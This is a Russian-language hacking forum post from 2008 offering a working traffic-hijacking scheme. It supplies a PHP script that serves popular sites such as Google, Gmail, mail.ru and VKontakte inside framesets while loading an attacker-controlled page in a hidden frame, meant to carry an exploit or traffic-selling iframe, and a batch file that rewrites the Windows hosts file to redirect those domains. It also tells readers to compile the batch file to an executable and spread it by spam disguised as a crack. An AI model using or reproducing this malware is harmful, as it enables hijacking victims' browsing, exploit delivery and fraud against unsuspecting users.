Форум АНТИЧАТ - Сливаем траф через hosts

Сливаем траф через hosts

25.08.2008, 11:08

~~-=KeepeR=-~~

Banned

Регистрация: 24.08.2008

Сообщений: 2

Провел на форуме:
46905

Репутация: 11

Сливаем траф через hosts

Сливаем траф через hosts

В данном топике я вам покажу еще один способ получить постоянный трафик.
Для реализации нам потребуеться хостинг с выделенным ip, либо дед с поднятым на нём денвером.
Обьясню попорядку. После заражения, когда жертва в очередной раз будет прописывать google.com она будет пободать не google.com, а наш сервер, но самое главное что она даже небудет об этом подозревать, так как будет открываться содержимое google.com, но помимо этого в фрейме будет выполняться наш скрипт!
Для чего это нужно вообще? Люди ежедневно посещают такие порталы как google.com mail.ru vkontakte.ru, итп; мы же будем извлекать из этого свою выгоду!
-----------------------------------------------------------

Для примера я буду использовать ip - 127.0.0.1, вы будете ставить вместо него ip своего сервака!
Итак первое на чем мы остановимся это PHP скрипт(index.php) каторый будет выполнять всю основную работу(редирект и отображение нашего скрипта в фрейме).

PHP код:


		
			
<?

if ($_SERVER['HTTP_HOST'] == "mail.ru")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://194.67.57.26'>

</frameset>

");

}





if ($_SERVER['HTTP_HOST'] == "rambler.ru")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://81.19.70.3'>

</frameset>

");

}





if ($_SERVER['HTTP_HOST'] == "www.mail.ru")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://194.67.57.26'>

</frameset>

");

}





if ($_SERVER['HTTP_HOST'] == "www.combats.ru")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://80.239.177.34'>

</frameset>

");

}



if ($_SERVER['HTTP_HOST'] == "combats.ru")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://80.239.177.34'>

</frameset>

");

}



if ($_SERVER['HTTP_HOST'] == "yandex.ru")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://www.yandex.ru'>

</frameset>

");

}



if ($_SERVER['HTTP_HOST'] == "ya.ru")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://www.ya.ru'>

</frameset>

");

}





if ($_SERVER['HTTP_HOST'] == "www.google.com")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://209.85.135.99'>

</frameset>

");

}



if ($_SERVER['HTTP_HOST'] == "google.com")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://209.85.135.99'>

</frameset>

");

}



if ($_SERVER['HTTP_HOST'] == "www.microsoft.com")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://207.46.19.190'>

</frameset>

");

}



if ($_SERVER['HTTP_HOST'] == "microsoft.com")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://207.46.19.190'>

</frameset>

");

}



if ($_SERVER['HTTP_HOST'] == "www.gmail.com")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://72.14.253.83'>

</frameset>

");

}



if ($_SERVER['HTTP_HOST'] == "gmail.com")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://72.14.253.83'>

</frameset>

");

}



if ($_SERVER['HTTP_HOST'] == "www.vkontakte.ru")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://195.190.105.240'>

</frameset>

");

}



if ($_SERVER['HTTP_HOST'] == "vkontakte.ru")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://195.190.105.240'>

</frameset>

");

}



if ($_SERVER['HTTP_HOST'] == "www.odnoklasniki.ru")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://81.177.141.207'>

</frameset>

");

}



if ($_SERVER['HTTP_HOST'] == "odnoklasniki.ru")

{

echo("

<Frameset rows=',100%'>

<frame src='nash_script.php'>

<frame src='http://81.177.141.207'>

</frameset>

");

}

?>

Где nash_script.php - страничка каторая будет открываться в невидимом фрейме, в нее Вы можете записать свой эксплоит или вставить ссылкус какойто партнерки, либо поставить ифрейм своей TDS, вобсчем это ваш трафф!
-----------------------------------------------------------

Теперь перейдем непосредсвенно к тому какже заставить компьютер обращаться к нашему серверу, для этого мы будем использовать .bat файл, каторый будет записовать в С:\Windows\system32\drivers\etc\hosts нужные нам строки.
Итак создаем bat файл с таким содержимым:

Цитата:

@echo off
echo 127.0.0.1 mail.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.mail.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 rambler.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.combats.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 combats.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 yandex.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 ya.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.google.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 google.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.microsoft.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 microsoft.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 gamil.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.gmail.com >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.vkontakte.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 vkontakte.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 www.odnoklasniki.ru >> C:\windows\system32\drivers\etc\hosts
echo 127.0.0.1 odnoklasniki.ru >> C:\windows\system32\drivers\etc\hosts

Теперь идем в гугл и качаем прогу bat2exe и компилим наш батник в ексешку!
Все теперь распотраняем наш файл всеми известными способами, например спамом под видом крякере интерета.... Вобсчем это неважно. Главно что после того как люди запустят наш файл у себя на компе у нас появиться постоянный трафик каторым мы сможем свободно распоряжаться!

Зы. Особо не пинайте, так как тема топика давольно боянистая, но всеже такого я нечитал негде......

ANTICHAT — форум по информационной безопасности, OSINT и технологиям